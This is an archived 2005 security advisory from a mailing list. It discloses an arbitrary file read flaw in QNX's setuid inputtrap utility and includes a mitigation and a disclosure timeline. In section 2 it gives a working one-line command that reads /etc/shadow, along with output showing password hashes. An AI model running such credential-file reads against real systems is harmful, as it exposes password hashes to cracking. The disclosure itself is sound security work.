lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <E1E7wMo-0000Xh-Eq@servidor7.sdmservidores.com>
Date: Wed Aug 24 15:36:57 2005
From: julio at rfdslabs.com.br (Julio Cesar Fort)
Subject: [RLSA_01-2005] QNX inputtrap arbitrary file read
	vulnerability

                *** rfdslabs security advisory ***

Title: QNX inputtrap arbitrary file read vulnerability [RLSA_01-2005]
Versions: QNX RTOS 6.3, 6.1.0 (possibly others)
Vendor: http://www.qnx.com
Date: Feb 22 2004

Author: Julio Cesar Fort <julio *NO_SPAM* rfdslabs com br>

1. Introduction

   inputtrap is a utility designed to detect and start input manager in QNX.

2. Details

   inputtrap has a '-t' flag to specify the trap file to be read. Due to
impro-
per permissions checking, we have administrative access to read files
anywhere
in the disk in addition with 'start' flag.

The following simple command will show us /etc/shadow:

$ inputtrap -t /etc/shadow start
options: Unable to lookup root:21QjUKxP9gEJK:0:0:0 in modules table
options: Unable to lookup sandimas:91UzHxvt3x1n2:0:0:0 in modules table

PS: This "design error" problem is similar to an old Debian 1.1 DOSEmu
vulnera-
    bility, back in 1999. And it was, surely, erradicated in crucial
programs
    of most operating systems.

3. Solution

   No official solution yet. We suggest remove inputtrap suid bit or
change its
permissions to a trusted group of users until QNX doesn't release an
official
patch.

4. Timeline

22 Feb 2005: Vulnerability detected (in a very very boring day, ill at
home);
09 Jun 2005: Advisory sent to QNX;
10 Jun 2005: QNX contacted rfdslabs;
24 Aug 2005: Advisory sent to security mailing lists.

Thanks to Lucien Rocha, Carlos Barros (barrossecurity.com), George Fleury,
Rodrigo Costa (NERV), Despise, gotfault.org and everyone at rfdslabs.

www.rfdslabs.com.br - computers, sex, human mind, music and more
Recife, PE, Brazil

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ